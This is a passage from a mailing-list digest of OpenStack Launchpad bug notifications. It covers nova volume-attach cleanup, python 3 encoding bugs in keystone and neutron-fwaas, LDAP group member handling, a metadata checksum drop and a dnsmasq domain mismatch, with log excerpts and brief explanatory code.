fails but remains connected to the host and no further exception gets logged. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes.
[Other Info] * N/A Description To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1825882/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1826523] Re: libvirtError exceptions during volume attach leave volume connected to host
This bug was fixed in the package nova - 2:19.0.0-0ubuntu2.3~cloud0 --- nova (2:19.0.0-0ubuntu2.3~cloud0) bionic-stein; urgency=medium . * New update for the Ubuntu Cloud Archive. . nova (2:19.0.0-0ubuntu2.3) disco; urgency=medium . * d/p/bug_1825882.patch: Cherry-picked from upstream to ensure virsh disk attach does not fail silently (LP: #1825882). * d/p/bug_1826523.patch: Cherry-picked from upstream to ensure volumes are always disconnected after libvirt exceptions (LP: #1826523). ** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1826523 Title: libvirtError exceptions during volume attach leave volume connected to host Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Committed Bug description: [Impact] * This is an additional patch required for bug #1825882: when a libvirt exception prevents the volume attachment from completing, the underlying volumes should be disconnected from the host. [Test Case] * Deploy any OpenStack version up to Pike, which includes ceph-backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic.
Run the following command on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should be attached after this step. * If the behavior is fixed: * Check that openstack server show doesn't display the volume as attached. * If the behavior isn't fixed: * openstack server show will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and the volume is disconnected from the host. [Actual result] * Volume attach fails but remains connected to the host. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes. [Other Info] * N/A To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826523/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1832265] Re: py3: inconsistent encoding of token fields
** Also affects: keystone (Ubuntu Disco) Importance: Undecided Status: New ** Also affects: keystone (Ubuntu Cosmic) Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1832265 Title: py3: inconsistent encoding of token fields Status in OpenStack Keystone LDAP integration: Invalid Status in OpenStack Identity (keystone): In Progress Status in keystone package in Ubuntu: Fix Released Status in keystone source package in Cosmic: New Status in keystone source package in Disco: New Bug description: When using an LDAP domain user on a bionic-rocky cloud within horizon, we are unable to see the projects listed in the project selection drop-down, and are unable to query resources from any projects to which we are assigned the role Member. It appears that the following log entries in keystone may be helpful to troubleshooting this issue: (keystone.middleware.auth): 2019-06-10 19:47:02,700 DEBUG RBAC: auth_context: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG Dispatching request to legacy mapper: /v3/users (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG SCRIPT_NAME: `/v3`, PATH_INFO: `/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects` (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Matched GET 
/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Route path: '/users/{user_id}/projects', defaults: {'action': 'list_user_projects', 'controller': } (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Match dict: {'user_id': 'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'action': 'list_user_projects', 'controller': } (keystone.common.wsgi): 2019-06-10 19:47:02,700 INFO GET https://keystone.mysite:5000/v3/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (keystone.common.controller): 2019-06-10 19:47:02,700 DEBUG RBAC: Adding query filter params () (keystone.common.authorization): 2019-06-10 19:47:02,700 DEBUG RBAC: Authorizing identity:list_user_projects(user_id=d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4) (keystone.policy.backends.rules): 2019-06-10 19:47:02,701 DEBUG enforce identity:list_user_projects: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.common.wsgi): 2019-06-10 19:47:02,702 WARNING You are not authorized to perform the requested action: identity:list_user_projects. It actually appears elsewhere in the keystone.log that there is a string which has encapsulated bytecode data in it (or vice versa). 
(keystone.common.wsgi): 2019-06-10 19:46:59,019 INFO POST https://keystone.mysite:5000/v3/auth/tokens (sqlalchemy.orm.path_registry): 2019-06-10 19:46:59,021 DEBUG set 'memoized_setups' on path 'EntityRegistry((,))' to '{}' (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,021 DEBUG Connection checked out from pool (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection being returned to pool (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection rollback-on-return, via agent (keystone.auth.core): 2019-06-10 19:46:59,025 DEBUG MFA Rules not processed for user `b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4'`. Rule list: `[]` (Enabled: `True`). (keystone.common.wsgi): 2019-06-10 19:46:59,025 ERROR a bytes-like object is required, not 'str' Traceback (most recent call last): File "/usr/lib/python3/dist-packages/keystone/common/wsgi.py", line 148, in __call__ result = method(req, **params) File "/usr/lib/python3/dist-packages/keystone/auth/controllers.py", line 102, in authenticate_for_token app_cred_id=app_cred_id, parent_audit_id=token_audit_id) File "/usr/lib/pyth
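The symptom in the logs above (user_id appearing as b'...' while authorization fails with "a bytes-like object is required, not 'str'") is the classic python 3 bytes/str mismatch: a bytes id never compares equal to the str id from the request path. A minimal illustration; ids_match is a hypothetical helper, not keystone's API:

```python
# bytes vs str ids under python 3: equality across the two types is
# always False, so any comparison-based check fails until the bytes
# value is decoded. ids_match() is hypothetical, for illustration only.

def ids_match(token_user_id, path_user_id):
    if isinstance(token_user_id, bytes):
        token_user_id = token_user_id.decode('utf-8')
    return token_user_id == path_user_id
```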
[Yahoo-eng-team] [Bug 1832210] Re: incorrect decode of log prefix under python 3
** Also affects: cloud-archive Importance: Undecided Status: New ** Changed in: neutron-fwaas (Ubuntu Eoan) Status: New => Fix Committed ** Also affects: cloud-archive/rocky Importance: Undecided Status: New ** Also affects: cloud-archive/stein Importance: Undecided Status: New ** Also affects: cloud-archive/train Importance: Undecided Status: New ** Changed in: cloud-archive/train Status: New => Fix Committed ** Changed in: cloud-archive/stein Status: New => Triaged ** Changed in: cloud-archive/rocky Status: New => Triaged ** Changed in: neutron-fwaas (Ubuntu Disco) Status: New => Triaged ** Changed in: neutron-fwaas (Ubuntu Cosmic) Status: New => Triaged ** Changed in: neutron-fwaas (Ubuntu Cosmic) Importance: Undecided => Medium ** Changed in: neutron-fwaas (Ubuntu Disco) Importance: Undecided => Medium ** Changed in: cloud-archive/rocky Importance: Undecided => Medium ** Changed in: cloud-archive/train Importance: Undecided => Medium ** Changed in: neutron-fwaas (Ubuntu Eoan) Importance: Undecided => Medium ** Changed in: cloud-archive/stein Importance: Undecided => Medium -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. 
https://bugs.launchpad.net/bugs/1832210 Title: incorrect decode of log prefix under python 3 Status in Ubuntu Cloud Archive: Triaged Status in Ubuntu Cloud Archive rocky series: Triaged Status in Ubuntu Cloud Archive stein series: Triaged Status in Ubuntu Cloud Archive train series: Fix Committed Status in neutron: Fix Released Status in neutron-fwaas package in Ubuntu: Fix Committed Status in neutron-fwaas source package in Cosmic: Triaged Status in neutron-fwaas source package in Disco: Triaged Status in neutron-fwaas source package in Eoan: Fix Committed Bug description: Under Python 3, the prefix of a firewall log message is not correctly decoded "b'10612530182266949194'": 2019-06-10 09:14:34 Unknown cookie packet_in pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120) 2019-06-10 09:14:34 {'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"} 2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]} This results in the firewall log driver not being able to map the message to the associated port and log 
resources in neutron resulting in the 'unknown cookie packet_in' warning message. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1832210/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
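The "b'10612530182266949194'" prefix above is what str() produces for a bytes cookie under python 3; the resulting key never matches the str cookies used for the port/log lookup. A minimal illustration of the difference; format_prefix is a hypothetical helper, not the actual neutron-fwaas code:

```python
# str() on bytes embeds the b'...' repr in the result; decoding first
# yields the plain digits the lookup table is keyed on.

def format_prefix(raw):
    return raw.decode('utf-8') if isinstance(raw, bytes) else raw
```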
[Yahoo-eng-team] [Bug 1832766] Re: LDAP group_members_are_ids = false fails in Rocky/Stein
** Also affects: keystone (Ubuntu) Importance: Undecided Status: New ** Changed in: keystone (Ubuntu) Assignee: (unassigned) => James Page (james-page) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1832766 Title: LDAP group_members_are_ids = false fails in Rocky/Stein Status in OpenStack Identity (keystone): New Status in keystone package in Ubuntu: New Bug description: I'm running into an interesting issue with group_members_are_ids: false. Per the documentation, this means that the group's group_member_attribute values (in my case "member") are understood to be full LDAP DNs to the user records. https://docs.openstack.org/keystone/queens/_modules/keystone/identity/backends/ldap/core.html#Identity.list_users_in_group Unfortunately, the call to self._transform_group_member_ids(group_members) calls self.user._dn_to_id(user_key) where user_key would be a string like "uid=dfreiberger,ou=users,dc=mysite,dc=com". This code is here: https://docs.openstack.org/keystone/queens/_modules/keystone/identity/backends/ldap/core.html#Identity.list_users_in_group This calls out to: return ldap.dn.str2dn(dn)[0][0][1] https://github.com/openstack/keystone/blob/stable/rocky/keystone/identity/backends/ldap/common.py#L1298 from: https://www.python-ldap.org/en/latest/reference/ldap-dn.html#ldap.dn.str2dn, this should spit out something like: >>> ldap.dn.str2dn('cn=Michael Str\xc3\xb6der,dc=example,dc=com',flags=ldap.DN_FORMAT_LDAPV3) [[('cn', 'Michael Str\xc3\xb6der', 4)], [('dc', 'example', 1)], [('dc', 'com', 1)]] Which would then mean the return from _dn_to_id(user_key) would be "Michael Str\xc3\xb6der" or "dfreiberger" in my example user_key above.
Ultimately, this means that group_members_are_ids = false will return a user_id equal to the value of the first attribute in the DN string, even if the first field of the DN is not the actual user_name_attribute or user_id_attribute. If group_members_are_ids = true, it will return uidNumbers, which work fine with the knock-on calls in the identity backend.

- The problem is that _transform_group_member_ids has to return a user ID such as the typical hex ID of a user in the keystone database, not the username of the user.
- With group_members_are_ids = true, uidNumber is returned by the function, but with group_members_are_ids = false, usernames are returned by the function.
- Also, the _dn_to_id(user_key) from the group only returns the first entry in the DN, not the actual user_id_attribute or user_name_attribute field of the object. This rests on the broken assumption that the user_id_attribute field called out in the LDAP client config is also the first field of the distinguished name.
- This would bug out if, say, your group had a member attribute/value pair of member="cn=Drew Freiberger,dc=mysite,dc=com": _dn_to_id would return "Drew Freiberger" as my user_id; however, I may have told LDAP that the user_name_attribute is uid, and inside my LDAP record of "dn=cn=Drew Freiberger,dc=mysite,dc=com" there is a uid=dfreiberger field showing my login name is dfreiberger, which is what _dn_to_id should return. Or perhaps _dn_to_id should return my uidNumber=12345 attribute to actually function as expected.

To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1832766/+subscriptions
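[Editor's sketch] The first-RDN behaviour described above can be illustrated without python-ldap. This is a simplified stand-in parser (the real keystone code uses ldap.dn.str2dn and handles escaping); it only demonstrates why taking the first RDN's value is wrong when the DN does not begin with the configured user_id_attribute:

```python
# Simplified sketch of keystone's _dn_to_id behaviour (illustrative only;
# the real implementation uses ldap.dn.str2dn): the user id is taken from
# the value of the *first* RDN, whatever its attribute happens to be.
# Note: this naive split ignores escaped commas in RDN values.
def dn_to_id(dn: str) -> str:
    first_rdn = dn.split(",")[0]               # e.g. "cn=Drew Freiberger"
    attr, _, value = first_rdn.partition("=")  # attr is discarded entirely
    return value

# Works only by coincidence when the DN happens to start with uid:
print(dn_to_id("uid=dfreiberger,ou=users,dc=mysite,dc=com"))  # dfreiberger

# Breaks when the DN starts with cn instead -- the CN is returned even
# though user_name_attribute/user_id_attribute may be configured as uid:
print(dn_to_id("cn=Drew Freiberger,dc=mysite,dc=com"))        # Drew Freiberger
```

The point is that the attribute name in the first RDN is never checked against the configured user_id_attribute before its value is used as the user ID.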
[Yahoo-eng-team] [Bug 1832265] Re: keystone LDAP integration in rocky not working for RBAC rules or token auth
Raising a bug task against keystone as I think that we may need to expand the decode coverage in token_formatters.
** Changed in: keystone (Ubuntu) Assignee: (unassigned) => James Page (james-page)
** Changed in: keystone (Ubuntu) Importance: Undecided => High
** Changed in: keystone (Ubuntu) Status: New => In Progress
** Changed in: charm-keystone-ldap Status: New => Invalid
-- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone).
https://bugs.launchpad.net/bugs/1832265

Title: keystone LDAP integration in rocky not working for RBAC rules or token auth
Status in OpenStack Keystone LDAP integration: Invalid
Status in OpenStack Identity (keystone): New
Status in keystone package in Ubuntu: In Progress

Bug description: When using an LDAP domain user on a bionic-rocky cloud within horizon, we are unable to see the projects listed in the project selection drop-down, and are unable to query resources from any projects to which we are assigned the role Member.
It appears that the following log entries in keystone may be helpful to troubleshooting this issue:

(keystone.middleware.auth): 2019-06-10 19:47:02,700 DEBUG RBAC: auth_context: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []}
(keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG Dispatching request to legacy mapper: /v3/users
(keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG SCRIPT_NAME: `/v3`, PATH_INFO: `/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects`
(routes.middleware): 2019-06-10 19:47:02,700 DEBUG Matched GET /users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects
(routes.middleware): 2019-06-10 19:47:02,700 DEBUG Route path: '/users/{user_id}/projects', defaults: {'action': 'list_user_projects', 'controller': }
(routes.middleware): 2019-06-10 19:47:02,700 DEBUG Match dict: {'user_id': 'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'action': 'list_user_projects', 'controller': }
(keystone.common.wsgi): 2019-06-10 19:47:02,700 INFO GET https://keystone.mysite:5000/v3/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects
(keystone.common.controller): 2019-06-10 19:47:02,700 DEBUG RBAC: Adding query filter params ()
(keystone.common.authorization): 2019-06-10 19:47:02,700 DEBUG RBAC: Authorizing identity:list_user_projects(user_id=d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4)
(keystone.policy.backends.rules): 2019-06-10 19:47:02,701 DEBUG enforce identity:list_user_projects: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []}
(keystone.common.wsgi): 2019-06-10 19:47:02,702 WARNING You are not authorized to perform the requested action: identity:list_user_projects.

It actually appears elsewhere in the keystone.log that there is a string which has encapsulated bytecode data in it (or vice versa).

(keystone.common.wsgi): 2019-06-10 19:46:59,019 INFO POST https://keystone.mysite:5000/v3/auth/tokens
(sqlalchemy.orm.path_registry): 2019-06-10 19:46:59,021 DEBUG set 'memoized_setups' on path 'EntityRegistry((,))' to '{}'
(sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,021 DEBUG Connection checked out from pool
(sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection being returned to pool
(sqlalchemy.pool.QueuePool): 2019-06-10 1
[Yahoo-eng-team] [Bug 1832265] Re: keystone LDAP integration in rocky not working for RBAC rules or token auth
TL;DR - I think the disassemble functions need to deal with the encoding better under py3; if the user_id gets into keystone decoded, then it should be dealt with correctly throughout.
** Also affects: keystone Importance: Undecided Status: New
-- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone).
https://bugs.launchpad.net/bugs/1832265

Title: keystone LDAP integration in rocky not working for RBAC rules or token auth
Status in OpenStack Keystone LDAP integration: Invalid
Status in OpenStack Identity (keystone): New
Status in keystone package in Ubuntu: In Progress

Bug description: When using an LDAP domain user on a bionic-rocky cloud within horizon, we are unable to see the projects listed in the project selection drop-down, and are unable to query resources from any projects to which we are assigned the role Member.

It appears that the following log entries in keystone may be helpful to troubleshooting this issue:

(keystone.middleware.auth): 2019-06-10 19:47:02,700 DEBUG RBAC: auth_context: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []}
(keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG Dispatching request to legacy mapper: /v3/users
(keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG SCRIPT_NAME: `/v3`, PATH_INFO: `/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects`
(routes.middleware): 2019-06-10 19:47:02,700 DEBUG Matched GET /users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects
(routes.middleware): 2019-06-10 19:47:02,700 DEBUG Route path: '/users/{user_id}/projects', defaults: {'action': 'list_user_projects', 'controller': }
(routes.middleware): 2019-06-10 19:47:02,700 DEBUG Match dict: {'user_id': 'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'action': 'list_user_projects', 'controller': }
(keystone.common.wsgi): 2019-06-10 19:47:02,700 INFO GET https://keystone.mysite:5000/v3/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects
(keystone.common.controller): 2019-06-10 19:47:02,700 DEBUG RBAC: Adding query filter params ()
(keystone.common.authorization): 2019-06-10 19:47:02,700 DEBUG RBAC: Authorizing identity:list_user_projects(user_id=d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4)
(keystone.policy.backends.rules): 2019-06-10 19:47:02,701 DEBUG enforce identity:list_user_projects: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []}
(keystone.common.wsgi): 2019-06-10 19:47:02,702 WARNING You are not authorized to perform the requested action: identity:list_user_projects.

It actually appears elsewhere in the keystone.log that there is a string which has encapsulated bytecode data in it (or vice versa).

(keystone.common.wsgi): 2019-06-10 19:46:59,019 INFO POST https://keystone.mysite:5000/v3/auth/tokens
(sqlalchemy.orm.path_registry): 2019-06-10 19:46:59,021 DEBUG set 'memoized_setups' on path 'EntityRegistry((,))' to '{}'
(sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,021 DEBUG Connection checked out from pool
(sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection being returned to pool
(sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection rollback-on-return, via agent
(keystone.auth.core): 2019-06-10 19:46:59,025 DEBUG MFA Rules not processed for user `b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4'`. Rule list: `[]` (Enabled: `True`).
(keystone.common.wsgi): 2019-06-10 19:46:59,025 ERROR a bytes-like object is required, not 'str'
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/keystone/common/wsgi.py", line 148, in __call__
    result = method(req, **params)
  File "/usr/lib/python3/dist-packages/keystone/auth/controllers.py", line 102, in authenticate_for_token
    app_cred_id=app_cred_id, parent_audit_id=token_audit_id)
  File "/usr
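[Editor's sketch] The bytes-vs-str mismatch visible in the logs above (a bytes user_id like b'd4fb94...' flowing where a str is expected) can be reduced to a few lines. The values below are taken from the logs; the surrounding logic is hypothetical, not keystone code:

```python
# Sketch of the py3 bytes/str mismatch suggested by the logs above
# (illustrative only, not keystone code): the LDAP backend yields a bytes
# user_id, while the token and RBAC paths expect str.
raw_id = b"d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4"
text_id = raw_id.decode("utf-8")

# bytes and str never compare equal under py3, so any lookup keyed on the
# str form silently misses:
assert raw_id != text_id

# and naive str() on bytes embeds the b'...' repr instead of decoding:
assert str(raw_id) == "b'%s'" % text_id

# Decoding once at the boundary keeps the id consistent throughout:
assert raw_id.decode("utf-8") == text_id
```

This is consistent with the TL;DR above: decode the id once where it enters keystone, then treat it as str everywhere downstream.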
[Yahoo-eng-team] [Bug 1832021] Re: Checksum drop of metadata traffic on isolated provider networks
** Also affects: charm-neutron-openvswitch Importance: Undecided Status: New
** This bug is no longer a duplicate of bug 1722584 [SRU] Return traffic from metadata service may get dropped by hypervisor due to wrong checksum
** Changed in: neutron Status: New => Incomplete
-- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1832021

Title: Checksum drop of metadata traffic on isolated provider networks
Status in OpenStack neutron-openvswitch charm: New
Status in neutron: Incomplete

Bug description: On an isolated network that uses provider networks for tenants (meaning without virtual routers: DVR or a network node), metadata access occurs in the qdhcp ip netns rather than the qrouter netns. The following options are set in the dhcp_agent.ini file:

force_metadata = True
enable_isolated_metadata = True

VMs on the provider tenant network are unable to access metadata, as packets are dropped due to a bad checksum. When we added the following rule in the qdhcp netns, VMs regained access to metadata:

iptables -t mangle -A OUTPUT -o ns-+ -p tcp --sport 80 -j CHECKSUM --checksum-fill

It seems this setting was recently removed from the qrouter netns [0] but it never existed in the qdhcp netns to begin with.

[0] https://review.opendev.org/#/c/654645/

Related LP Bug #1831935. See https://bugs.launchpad.net/charm-neutron-openvswitch/+bug/1831935/comments/10

To manage notifications about this bug go to: https://bugs.launchpad.net/charm-neutron-openvswitch/+bug/1832021/+subscriptions
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
This bug was fixed in the package neutron - 2:13.0.2-0ubuntu3.3~cloud0 --- neutron (2:13.0.2-0ubuntu3.3~cloud0) bionic-rocky; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:13.0.2-0ubuntu3.3) cosmic; urgency=medium . * d/p/bug1826419.patch: Cherry pick fix to revert incorrect changes to internal DNS behaviour (LP: #1826419). ** Changed in: cloud-archive/rocky Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Committed Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Bionic: Fix Released Status in neutron source package in Cosmic: Fix Released Status in neutron source package in Disco: Fix Released Status in neutron source package in Eoan: Fix Released Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. 
This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with:

root@bionic-045546-2:~# host 192.168.21.222
222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal.
root@bionic-045546-2:~# host bionic-045546-2
bionic-045546-2.designate.local has address 192.168.21.222

In the above example:

CONF.dns_domain = jamespage.internal.
network.dns_domain = designate.local.

Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intended for use for external DNS integration such as that provided by Designate. The change made under commit https://opendev.org/openstack/neutron/commit/137a6d61053 appears to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network.

To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826419/+subscriptions
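[Editor's sketch] The asymmetry described in this bug can be condensed to a few lines. The two domain values are taken from the example above; the helper logic is illustrative only, not neutron code:

```python
# Sketch of the mismatch (illustrative only, not neutron code): the dnsmasq
# hosts-file entry for a port is built from CONF.dns_domain, while the
# --domain flag passed to dnsmasq (and hence the instance's DNS search
# path) is taken from network.dns_domain.
conf_dns_domain = "jamespage.internal"    # CONF.dns_domain
network_dns_domain = "designate.local"    # network.dns_domain

hostname = "bionic-045546-2"
hosts_file_fqdn = f"{hostname}.{conf_dns_domain}"      # name dnsmasq serves (PTR)
search_path_fqdn = f"{hostname}.{network_dns_domain}"  # name clients actually query

# The two FQDNs only agree when both settings happen to match -- here
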